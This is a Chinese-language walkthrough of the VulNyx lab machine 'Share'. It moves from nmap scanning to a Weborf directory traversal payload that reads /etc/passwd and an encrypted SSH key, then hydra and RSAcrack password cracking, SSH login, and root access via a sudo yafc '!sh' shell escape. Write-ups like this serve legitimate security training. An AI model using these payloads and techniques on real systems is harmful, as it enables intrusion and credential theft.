Vlx_Share

靶机来源：https://vulnyx.com/

难度：Low

一、信息收集

1、主机探测

┌──(root㉿kali)-[/miaosec]
└─# nmap -sn 192.168.2.0/24              
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-15 16:52 CST
Nmap scan report for 192.168.2.1
Host is up (0.00036s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00074s latency).
MAC Address: 08:00:27:6D:0F:D7 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.47
Host is up (0.00079s latency).
MAC Address: 08:00:27:4A:76:70 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.09 seconds

靶机IP：192.168.2.47

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.47                        
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-15 16:52 CST
Nmap scan report for 192.168.2.47
Host is up (0.0012s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8080/tcp open  http-proxy
MAC Address: 08:00:27:4A:76:70 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 26.85 seconds

开放端口：22、80、8080

2.详细信息扫描

┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80,8080 192.168.2.47
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-15 16:53 CST
Nmap scan report for 192.168.2.47
Host is up (0.00084s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp   open  http       Apache httpd 2.4.56 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.56 (Debian)
8080/tcp open  http-proxy Weborf (GNU/Linux)
|_http-title: Weborf
| http-methods: 
|_  Potentially risky methods: PUT DELETE PROPFIND MKCOL COPY MOVE
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Page not found: Weborf (GNU/Linux)
|     Content-Length: 202
|     Content-Type: text/html
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 404</H1>Page not found <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
|   GetRequest: 
|     HTTP/1.1 200
|     Server: Weborf (GNU/Linux)
|     Content-Length: 960
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body><table><tr><td></td><td>Name</td><td>Size</td></tr><tr style="background-color: #DFDFDF;"><td>d</td><td><a href="systemd-private-104e212b13db45389c0a10dedd63d32e-apache2.service-8fjd3e/">systemd-private-104e212b13db45389c0a10dedd63d32e-apache2.service-8fjd3e/</a></td><td>-</td></tr>
|     style="background-color: #DFDFDF;"><td>d</td><td><a href="systemd-private-104e212b13db45389c0a10dedd63d32e-systemd-logind.service-HhFi4g/">systemd-private-104e212b13db45389c0a10dedd63d32e-systemd-logind.service-HhFi4g/</a></td><td>-</td></tr>
|     style="background-color: #DFDFDF;"><td>d</td><td><a href="systemd-private-104e212b13db45389c0a10dedd63d32e-systemd-timesyncd.service-iwqSmi/">systemd-private-104e212b13db45389c0a10dedd63d32e-
|   HTTPOptions, RTSPRequest: 
|     HTTP/1.1 200
|     Server: Weborf (GNU/Linux)
|     Allow: GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE
|     DAV: 1,2
|     DAV: <http://apache.org/dav/propset/fs/1>
|     MS-Author-Via: DAV
|   Socks5: 
|     HTTP/1.1 400 Bad request: Weborf (GNU/Linux)
|     Content-Length: 199
|     Content-Type: text/html
|_    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 400</H1>Bad request <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
| http-webdav-scan: 
|   WebDAV type: Apache DAV
|   Allowed Methods: GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE
|_  Server Type: Weborf (GNU/Linux)
|_http-server-header: Weborf (GNU/Linux)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.94SVN%I=7%D=1/15%Time=6968AB1A%P=x86_64-pc-linux-gnu%r
SF:(GetRequest,401,"HTTP/1\.1\x20200\r\nServer:\x20Weborf\x20\(GNU/Linux\)
SF:\r\nContent-Length:\x20960\r\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W
SF:3C//DTD\x20HTML\x204\.01\x20Transitional//EN\"><html><head><title>Webor
SF:f</title></head><body><table><tr><td></td><td>Name</td><td>Size</td></t
SF:r><tr\x20style=\"background-color:\x20#DFDFDF;\"><td>d</td><td><a\x20hr
SF:ef=\"systemd-private-104e212b13db45389c0a10dedd63d32e-apache2\.service-
SF:8fjd3e/\">systemd-private-104e212b13db45389c0a10dedd63d32e-apache2\.ser
SF:vice-8fjd3e/</a></td><td>-</td></tr>\n<tr\x20style=\"background-color:\
SF:x20#DFDFDF;\"><td>d</td><td><a\x20href=\"systemd-private-104e212b13db45
SF:389c0a10dedd63d32e-systemd-logind\.service-HhFi4g/\">systemd-private-10
SF:4e212b13db45389c0a10dedd63d32e-systemd-logind\.service-HhFi4g/</a></td>
SF:<td>-</td></tr>\n<tr\x20style=\"background-color:\x20#DFDFDF;\"><td>d</
SF:td><td><a\x20href=\"systemd-private-104e212b13db45389c0a10dedd63d32e-sy
SF:stemd-timesyncd\.service-iwqSmi/\">systemd-private-104e212b13db45389c0a
SF:10dedd63d32e-")%r(HTTPOptions,B2,"HTTP/1\.1\x20200\r\nServer:\x20Weborf
SF:\x20\(GNU/Linux\)\r\nAllow:\x20GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKC
SF:OL,COPY,MOVE\r\nDAV:\x201,2\r\nDAV:\x20<http://apache\.org/dav/propset/
SF:fs/1>\r\nMS-Author-Via:\x20DAV\r\n\r\n")%r(RTSPRequest,B2,"HTTP/1\.1\x2
SF:0200\r\nServer:\x20Weborf\x20\(GNU/Linux\)\r\nAllow:\x20GET,POST,PUT,DE
SF:LETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE\r\nDAV:\x201,2\r\nDAV:\x20<http:/
SF:/apache\.org/dav/propset/fs/1>\r\nMS-Author-Via:\x20DAV\r\n\r\n")%r(Fou
SF:rOhFourRequest,12B,"HTTP/1\.1\x20404\x20Page\x20not\x20found:\x20Weborf
SF:\x20\(GNU/Linux\)\r\nContent-Length:\x20202\r\nContent-Type:\x20text/ht
SF:ml\r\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x204\.01
SF:\x20Transitional//EN\"><html><head><title>Weborf</title></head><body>\x
SF:20<H1>Error\x20404</H1>Page\x20not\x20found\x20<p>Generated\x20by\x20We
SF:borf/0\.12\.2\x20\(GNU/Linux\)</p></body></html>")%r(Socks5,125,"HTTP/1
SF:\.1\x20400\x20Bad\x20request:\x20Weborf\x20\(GNU/Linux\)\r\nContent-Len
SF:gth:\x20199\r\nContent-Type:\x20text/html\r\n\r\n<!DOCTYPE\x20HTML\x20P
SF:UBLIC\x20\"-//W3C//DTD\x20HTML\x204\.01\x20Transitional//EN\"><html><he
SF:ad><title>Weborf</title></head><body>\x20<H1>Error\x20400</H1>Bad\x20re
SF:quest\x20<p>Generated\x20by\x20Weborf/0\.12\.2\x20\(GNU/Linux\)</p></bo
SF:dy></html>");
MAC Address: 08:00:27:4A:76:70 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.8 (99%), Linux 5.0 - 5.5 (99%), Linux 5.0 - 5.4 (97%), Linux 3.2 - 4.9 (96%), Linux 2.6.32 - 3.10 (96%), Linux 2.6.32 (96%), Linux 5.4 (95%), Linux 3.1 (95%), Linux 3.2 (95%), Linux 5.3 - 5.4 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 147.24 seconds

3.udp扫描

┌──(root㉿kali)-[/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.47                          
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-15 16:58 CST
Nmap scan report for 192.168.2.47
Host is up (0.0010s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT   STATE         SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:4A:76:70 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 109.81 seconds

二、WEB渗透

1、80网站

访问80端口，是Apache默认页面

2、8080- Weborf

访问8080端口，提示由Weborf/0.12.2生成

查看 Weborf/0.12.2发现该版本存在目录遍历漏洞

/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

成功读取到用户`tim

尝试使用hydra爆破用户的密码，发现不支持密码登录

┌──(root㉿kali)-[/miaosec]
└─# hydra -t 64 -l tim  -P /usr/share/wordlists/rockyou.txt  ssh://192.168.2.47 -F -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-01-15 17:00:39
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ssh://192.168.2.47:22/
[ERROR] target ssh://192.168.2.47:22/ does not support password authentication (method reply 4).

尝试读取用户tim的私钥

/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2ftim%2f.ssh%2fid_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,18A95149B088CB78

aBu3NjmcUfADWuzFpwWxasSBX4cxz/+CcEEHscqmZeN5ywjwFXYFcZd6TCf0lezw
faOYDAQP2e/OkND5DGhuhSIt/sWgO4k9eSgMmtqwkiHH4CCtAZ7/JLgFQaTtvQMB
XjoUOZBBI/nxlvr1GXT62uvADBDBuba7DAwBmiANq94C5znPLXPgHw5lNzFgdwZj
Aj2W0e2I/dKMcHtvABX1zc+UTUjyR1fslZYgOWD3oA9DANEX2jnmxJi2pwTdAi7p
X80LhLLhBY5MbGwE0Ssi0//84aoWXpEOL1xMB8GClhpEYyMncE7Vk3hizKeY94SE
JmslraQd8vwI8asZ/NKAuIv1qN2wXBVxKBcT4ybcAtTKUQCfCtOk8CLerR4DeHIc
J8hCU31yyZly6LBbfXaFIxsNj+nb1bkHf45vWjEgaTlr8TxNqUivI+sl4MOecNJd
je/4d90mai5vNkHQlE1MwjwZ33WHNeCA2OnNAMjfjgqqwUCI3rLxryv0nwT3BvBM
swJ4OVp0JA9gMfPav0H36gEyzQuoJgltdHVKWnv7mTwVVfjEe97TPWxsWIRfcqeR
Gx8S7+/hoqGL7NKSOVecjHbmtnJYJfpX3lJ42kWQ+bNVxPAHYQC9LMtJBSbCoDvE
zqlodfF8uybFspdYuDtwkBZdZg1P7Xqn9VBdAy8hzY5LaMfTbKMvbvbBj7+I+/3Y
267NTNsxOickCifcD/2BWogvIMXYou18Sjks6jW7XgYeYJj0Z6jj7FmaT3kA3aox
C1u+qemIRa+qVE4aYUt1EyWN7/gPpfmrxnqR6/g1LiMi8AaIiCVCd59LN3a82nQ+
jbg7e0/DIRER383n5Ky2jHNvj5h6aqs5usxpKv2pWid93WNShqlJs0nFZ96khtFf
gd7eE9BDX2QhB6GpOZpPUwEJLh/laDlld1DFBxRDCdlXGwJnIVc/9v6l03HpHwDY
IlwY2TTbFApmXMDD6geVmc/jEjhtaHqxJV6W0tAenFJpaPqRxxz5g4KHNAd2ynnc
LDbZCgXl2QNkonhJn7ABc1tjAU5JAFaQskVw751+JjZyUyPbGWDrVAPisuS9krNx
ZGjlviNY0meJYq11JWLfimt8zWnKKQ7f9TwSr5bTsctz94xw9imK3pQifvuXJBDn
xAXb/CAJj8HfMlxD8cXaQ174RntE8/cNeG+oonqmkCajZ5STPiTzVURcmEDNSSNR
DboKfz2St/qzoXtJjNiryQ6tsuGhzJjtJKQ3TX0FbOUwc6uHi31kLOsviKLLnTIt
NOHFzUV2Z/jcELP5bnEuVABCqUAUeHYoa0fxjr3pDA8M7vMrT7acwU4qzl+RVMw3
3Oqeqz8JslhJnhLWmgbhyqKnpeXHuS4EkowR/LgrfO8q3GcA1HM9/NRYBrdqwXhA
FfgQAPgaTrwwUykqjq0nYFaQIy7U0LyZ5dJTnTDGGc69X888yC/h0s78ANW9qdzp
k8awm1OE0sggJcmj6PV2vCJeGasYWNY5cE0ORyj4yp76DhkCzTQPG2R5NTe4WFmB
tgnHhIzocSa04QPldHxgwBPLTAG+wXRLCSsBRIXYlmqm4+gIXldVrWxu/rEAmZ8a
-----END RSA PRIVATE KEY-----

三、RSACrack

该私钥是加密的 RSA 私钥（PEM 格式），使用了 3DES（DES-EDE3-CBC） 加密 直接使用rsacrack进行爆破

┌──(root㉿kali)-[/miaosec/RSAcrack-main]
└─# ./RSAcrack -k /tmp/id_rsa -w /usr/share/wordlists/rockyou.txt

 ╭━━━┳━━━┳━━━╮          ╭╮  
 ┃╭━╮┃╭━╮┃╭━╮┃          ┃┃  
 ┃╰━╯┃╰━━┫┃ ┃┣━━┳━┳━━┳━━┫┃╭╮
 ┃╭╮╭┻━━╮┃╰━╯┃╭━┫╭┫╭╮┃╭━┫╰╯╯
 ┃┃┃╰┫╰━╯┃╭━╮┃╰━┫┃┃╭╮┃╰━┫╭╮╮
 ╰╯╰━┻━━━┻╯ ╰┻━━┻╯╰╯╰┻━━┻╯╰╯
─────────────────────────────
 code: d4t4s3c   ver: v1.0.0
─────────────────────────────
[i] Cracking | /tmp/id_rsa
[i] Wordlist | /usr/share/wordlists/rockyou.txt
[*] Status   | 5280/14344392/0%/ilovetim
[+] Password | ilovetim
─────────────────────────────

找到用户tim的id_rsa密码为ilovetim

四、获取TIM权限

直接进行登录

┌──(root㉿kali)-[/tmp]
└─# ssh tim@192.168.2.47 -i id_rsa                          
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.2.47' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa': 
tim@share:~$ id
uid=1000(tim) gid=1000(tim) grupos=1000(tim)

五、权限提升

查看sudo -l

tim@share:~$ sudo -l
Matching Defaults entries for tim on share:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User tim may run the following commands on share:
    (root) NOPASSWD: /usr/bin/yafc

yafc 允许通过 ! 调用本地 shell，直接进行提权即可

tim@share:~$ sudo /usr/bin/yafc
yafc 1.3.7
This program comes with ABSOLUTELY NO WARRANTY; for details type 'warranty'.
This is free software; type 'copyright' for details.

yafc> !sh
# id
uid=0(root) gid=0(root) grupos=0(root)
# bash
root@share:/home/tim# id
uid=0(root) gid=0(root) grupos=0(root)

六、查看FLAG

root@share:/home/tim# cat /root/root.txt /home/tim/user.txt 
9afccad10d60149614ee118ab000acf4
721ee6f6e2ae532298eee2b66dd0a3f7